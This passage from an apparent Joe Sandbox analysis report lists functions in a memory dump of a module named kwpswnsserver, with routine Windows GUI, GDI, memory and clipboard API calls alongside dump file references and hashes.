                                                                  • GetSubMenu.USER32(?,00000000), ref: 6C897D35
                                                                  • RemoveMenu.USER32(?,-00000001,00000400), ref: 6C897D50
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CountItem$Remove
                                                                  • String ID:
                                                                  • API String ID: 3494307843-0
                                                                  • Opcode ID: 0fc0ae57d6e5cfc751b5e99e1494be74ea078cfac7503b9fc066ab87b6ed79df
                                                                  • Instruction ID: 046f1b6cc440723d3c69c536fe8d8990e1509b681ab4981a1af1f8ddd99f5e48
                                                                  • Opcode Fuzzy Hash: 0fc0ae57d6e5cfc751b5e99e1494be74ea078cfac7503b9fc066ab87b6ed79df
                                                                  • Instruction Fuzzy Hash: EE11603260125AEBDB315F2DCD48E6F3BB8FB8275AF108A25F515A1438D7319582CA50
                                                                  Function 6C89ECB1 Relevance: 12.1, APIs: 8, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(00000031), ref: 6C89ECBF
                                                                  • GetSystemMetrics.USER32(00000032), ref: 6C89ECCD
                                                                  • SetRectEmpty.USER32(?), ref: 6C89ECE0
                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,6C89F489,?,?,?), ref: 6C89ECF0
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C89ECFF
                                                                  • SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C89ED2C
                                                                  • SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C89ED40
                                                                  • SystemParametersInfoW.USER32(0000100A,00000000,?,00000000), ref: 6C89ED66
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
                                                                  • String ID:
                                                                  • API String ID: 2614369430-0
                                                                  • Opcode ID: cc21c7201d8736d5cf1387a630fa2396873444b7af00a051e6feeba1cb7f475f
                                                                  • Instruction ID: 86c172df776f83c0662111d29c72537c2e6b5c4f3f545a17acab63f7982a64c1
                                                                  • Opcode Fuzzy Hash: cc21c7201d8736d5cf1387a630fa2396873444b7af00a051e6feeba1cb7f475f
                                                                  • Instruction Fuzzy Hash: 0B213BB1301626BFE7195F759C49AE2BBACFF0A389F008629F55DC6140E7706951CBA0
                                                                  Function 6C93BCCE Relevance: 12.1, APIs: 8, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(00000020), ref: 6C93BCFC
                                                                  • GetSystemMetrics.USER32(00000021), ref: 6C93BD06
                                                                  • GetSystemMetrics.USER32(00000005), ref: 6C93BD15
                                                                  • GetSystemMetrics.USER32(00000006), ref: 6C93BD1F
                                                                  • GetSystemMetrics.USER32(0000005C), ref: 6C93BD36
                                                                  • GetSystemMetrics.USER32(0000005C), ref: 6C93BD40
                                                                  • GetSystemMetrics.USER32(00000007), ref: 6C93BD58
                                                                  • GetSystemMetrics.USER32(00000008), ref: 6C93BD62
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 4116985748-0
                                                                  • Opcode ID: 42470d79f446958f23bf93f56fa5a764d533102081ab6a07b5c100928e29b8d4
                                                                  • Instruction ID: a7d8f1b55a5d52fdc2df9fa8820b57218fde54dea5c10fbde6cd3f404812a11d
                                                                  • Opcode Fuzzy Hash: 42470d79f446958f23bf93f56fa5a764d533102081ab6a07b5c100928e29b8d4
                                                                  • Instruction Fuzzy Hash: 7C115B72741B229FE7216FA48C19756B7F8EF12B1AF11892EE6ADD6680D770D490CB00
                                                                  Function 6C8980E7 Relevance: 12.0, APIs: 8, Instructions: 49memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalSize.KERNEL32(?), ref: 6C8980F0
                                                                  • GlobalAlloc.KERNEL32(00002002,00000000,?,?,6C898063,?,?,00000054), ref: 6C898108
                                                                  • GlobalLock.KERNEL32(?), ref: 6C898118
                                                                  • GlobalLock.KERNEL32(?), ref: 6C898121
                                                                  • GlobalSize.KERNEL32(?), ref: 6C89812E
                                                                  • GlobalUnlock.KERNEL32(?), ref: 6C89813F
                                                                  • GlobalUnlock.KERNEL32(?), ref: 6C898148
                                                                  • GlobalSize.KERNEL32(?), ref: 6C898158
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Size$LockUnlock$Alloc
                                                                  • String ID:
                                                                  • API String ID: 2344174106-0
                                                                  • Opcode ID: 3668046e02a6b4027088317d0be786b9d637d6558071f51ba36404e94db33aab
                                                                  • Instruction ID: 6d65baaeb771103fccc9c434a2aff5101b5d7390c421afe01b358f75dedfce58
                                                                  • Opcode Fuzzy Hash: 3668046e02a6b4027088317d0be786b9d637d6558071f51ba36404e94db33aab
                                                                  • Instruction Fuzzy Hash: D6014872701326BFDB257BB58D9EC5B7F7CEB063997018A25FD0AD3201D6358E0196A0
                                                                  Function 6C8863F7 Relevance: 10.8, APIs: 7, Instructions: 347COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OffsetRect.USER32(?,00000000,?), ref: 6C886510
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 6C886530
                                                                  • SetCapture.USER32(?), ref: 6C8865A3
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000180,00000000), ref: 6C8865C2
                                                                  • ReleaseCapture.USER32 ref: 6C886650
                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 6C8866C6
                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 6C8866D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: OffsetRect$Capture$RedrawReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 1110970518-0
                                                                  • Opcode ID: d86afb4662383546b9d420dc067ea1a78e29a53bd8240038a20651dae7a70297
                                                                  • Instruction ID: cec33ab83b5c9ef83923b6821fb11b7cc4590e93b3ad9c105c63e173f99ce170
                                                                  • Opcode Fuzzy Hash: d86afb4662383546b9d420dc067ea1a78e29a53bd8240038a20651dae7a70297
                                                                  • Instruction Fuzzy Hash: D8D17D357002299FCF189F28C998BAD37B5BF89314F5446B9ED0ADB785DB70AC018B94
                                                                  Function 6C8CA09B Relevance: 10.7, APIs: 7, Instructions: 181COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CA0A2
                                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,?,?,00000000), ref: 6C8CA127
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CA181
                                                                  • GetTextColor.GDI32(?), ref: 6C8CA18C
                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 6C8CA1D6
                                                                    • Part of subcall function 6C880847: __EH_prolog3.LIBCMT ref: 6C88084E
                                                                    • Part of subcall function 6C883B86: SetTextAlign.GDI32(?,?), ref: 6C883B9C
                                                                    • Part of subcall function 6C883B86: SetTextAlign.GDI32(00000000,00000000), ref: 6C883BAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Text$H_prolog3$Align$ColorOffsetRect
                                                                  • String ID:
                                                                  • API String ID: 2099682203-0
                                                                  • Opcode ID: 37fda04c55e23819478464551c0676bebc222de706089550aa0e28376299ab24
                                                                  • Instruction ID: f1d8c703cded36683afb8ee9f8a22e6230ab2877255d010a067509bf3029a34d
                                                                  • Opcode Fuzzy Hash: 37fda04c55e23819478464551c0676bebc222de706089550aa0e28376299ab24
                                                                  • Instruction Fuzzy Hash: 6661BD31601219AFCF14DFA8CD44BEE7379BF0831AF108865E911ABA90DB74ED45CBA1
                                                                  Function 6C99C387 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 6C99C38E
                                                                    • Part of subcall function 6C99C651: OleGetClipboard.OLE32(00000000), ref: 6C99C667
                                                                  • ReleaseStgMedium.OLE32(?), ref: 6C99C412
                                                                  • ReleaseStgMedium.OLE32(?), ref: 6C99C459
                                                                  • ReleaseStgMedium.OLE32(?), ref: 6C99C468
                                                                  • CoTaskMemFree.OLE32(?,?,00000000,?,00000040,6C90713C,?,00000000,00000000,0000005C), ref: 6C99C518
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MediumRelease$ClipboardFreeH_prolog3_catchTask
                                                                  • String ID: '
                                                                  • API String ID: 3213536121-1997036262
                                                                  • Opcode ID: 7a4ff1501eff21beb55bde49787e0aa270ce62d6631e25e36752f4c69e768021
                                                                  • Instruction ID: f32635301b636a5e968f8a4172d1f2e6e97b30991b6c1c995ab2d5eef649fa85
                                                                  • Opcode Fuzzy Hash: 7a4ff1501eff21beb55bde49787e0aa270ce62d6631e25e36752f4c69e768021
                                                                  • Instruction Fuzzy Hash: 16519231A05209DBDF14EFB8CD44AEDBBB9AF49318F184029E911F7A80EB74D945CB61
                                                                  Function 6C8922C7 Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8BD649: IsWindow.USER32(?), ref: 6C8BD655
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C89248B
                                                                    • Part of subcall function 6C8BDCC7: GetClientRect.USER32(?,?), ref: 6C8BDCEF
                                                                    • Part of subcall function 6C8BDCC7: PtInRect.USER32(?,00000000,?), ref: 6C8BDD09
                                                                  • ScreenToClient.USER32(?,?), ref: 6C892358
                                                                  • PtInRect.USER32(?,?,?), ref: 6C89236B
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C89239D
                                                                  • GetParent.USER32(?), ref: 6C8923CD
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C89244B
                                                                  • GetFocus.USER32 ref: 6C892451
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageRectSend$Client$FocusParentScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1639644240-0
                                                                  • Opcode ID: 1a63ea607b21b80de91aeca034c11278dee6353dd773293c78f94faf66d9be16
                                                                  • Instruction ID: 7bf35ed9e6f13f2b330a31cd5bd8c142a980f99e1376a754b2b185b65aba99a8
                                                                  • Opcode Fuzzy Hash: 1a63ea607b21b80de91aeca034c11278dee6353dd773293c78f94faf66d9be16
                                                                  • Instruction Fuzzy Hash: F451D4B1A4021AAFCF24DF6DCE48A9E7BB8FF49308B104969E855E7751DB34D900CB90
                                                                  Function 6C8B43D5 Relevance: 10.6, APIs: 7, Instructions: 143COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C9070F4: __EH_prolog3_catch.LIBCMT ref: 6C9070FB
                                                                  • UpdateWindow.USER32(?), ref: 6C8B4482
                                                                  • EqualRect.USER32(?,?), ref: 6C8B44C2
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8B44DA
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8B44E9
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8B4500
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8B4512
                                                                  • UpdateWindow.USER32(?), ref: 6C8B451B
                                                                    • Part of subcall function 6C8B2BFA: InvalidateRect.USER32(?,?,00000001,?), ref: 6C8B2C71
                                                                    • Part of subcall function 6C8B2BFA: InflateRect.USER32(?,00000000,?), ref: 6C8B2CB7
                                                                    • Part of subcall function 6C8B2BFA: RedrawWindow.USER32(?,?,00000000,00000401), ref: 6C8B2CCB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
                                                                  • String ID:
                                                                  • API String ID: 1041772997-0
                                                                  • Opcode ID: 75ce80b8613deea935ac3fa03fc1b3db1ce0bb0708a6988c0b7e2fd8d5b7af71
                                                                  • Instruction ID: 3162048ea706ef1b2ec8c8a61f374dfba54b000a1ad53ba44fe8d6c21ab263eb
                                                                  • Opcode Fuzzy Hash: 75ce80b8613deea935ac3fa03fc1b3db1ce0bb0708a6988c0b7e2fd8d5b7af71
                                                                  • Instruction Fuzzy Hash: 2D51B07560021A9FCF15DF24C985BAE3BB5BF89314F144679EC1AEB391DB709901CBA0
                                                                  Function 6C9C2910 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C9C2947
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6C9C294F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C9C29D8
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6C9C2A03
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C9C2A58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: eae8f516d1288690708f7c1a380dcd23a378ae2ee74a2f18575cd93cddf83d60
                                                                  • Instruction ID: d338a62b5206dcde7e07ec8e1ec30ae0cf4576b585f40e9d6726bbc760203023
                                                                  • Opcode Fuzzy Hash: eae8f516d1288690708f7c1a380dcd23a378ae2ee74a2f18575cd93cddf83d60
                                                                  • Instruction Fuzzy Hash: 7C41D334B00A199BCF00DF68C888ADE7BB5BF55328F11D155E819AB791DB31EA05CB93
                                                                  Function 6C8A20FE Relevance: 10.6, APIs: 7, Instructions: 121windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8A2105
                                                                  • CreateCompatibleDC.GDI32(?), ref: 6C8A2134
                                                                  • GetClientRect.USER32(?,?), ref: 6C8A2151
                                                                  • SelectObject.GDI32(?,?), ref: 6C8A218A
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,00000001,00000000,00000000,00CC0020), ref: 6C8A21B1
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C8A2237
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C8A2245
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$ClientCompatibleCreateH_prolog3_Rect
                                                                  • String ID:
                                                                  • API String ID: 1651110115-0
                                                                  • Opcode ID: cdd4cfd8cabdbd37eaa3f68612257718eecd5aa02dce88a60612828e2cff45c9
                                                                  • Instruction ID: a3c815d9e968aaaf048caf5ec71200bcfa6db4b7c64cedc57d372af471f04400
                                                                  • Opcode Fuzzy Hash: cdd4cfd8cabdbd37eaa3f68612257718eecd5aa02dce88a60612828e2cff45c9
                                                                  • Instruction Fuzzy Hash: 0841F671A00219AFDF24DBA8CE95FEEBBB9BF58704F108129F105A3690DB746D05CB60
                                                                  Function 6C880C92 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C880C9C
                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 6C880CF6
                                                                  • IsAppThemed.UXTHEME(?,?,00000001,?), ref: 6C880D87
                                                                  • GetStockObject.GDI32(00000005), ref: 6C880D98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassH_prolog3_NameObjectStockThemed
                                                                  • String ID: Button$Static
                                                                  • API String ID: 2434646892-2498952662
                                                                  • Opcode ID: 5aefcff439a32f99ff4099f4b1ebac36bed63fc8165b0a8ffaedb7a023b08bfa
                                                                  • Instruction ID: 76525eb6dd5ce3d03ba38c4fe6e2c35473ffb35ba49d47748ba706a203d961e5
                                                                  • Opcode Fuzzy Hash: 5aefcff439a32f99ff4099f4b1ebac36bed63fc8165b0a8ffaedb7a023b08bfa
                                                                  • Instruction Fuzzy Hash: 2231C4319476599FCB34DF58CE88BDA7374AF15319F100AA8E81997E90DB30AD84CB61
                                                                  Function 6C8CC7F6 Relevance: 10.6, APIs: 7, Instructions: 82windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FillRect.USER32(?,?,-000000A0), ref: 6C8CC81F
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C8CC82D
                                                                  • PatBlt.GDI32(?,?,?,00000001,?,005A0049), ref: 6C8CC853
                                                                  • PatBlt.GDI32(?,?,?,?,00000001,005A0049), ref: 6C8CC86C
                                                                  • PatBlt.GDI32(?,00000000,?,00000001,?,005A0049), ref: 6C8CC885
                                                                  • PatBlt.GDI32(?,?,?,00000000,00000001,005A0049), ref: 6C8CC8A1
                                                                  • FillRect.USER32(?,?,-000000D0), ref: 6C8CC8C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
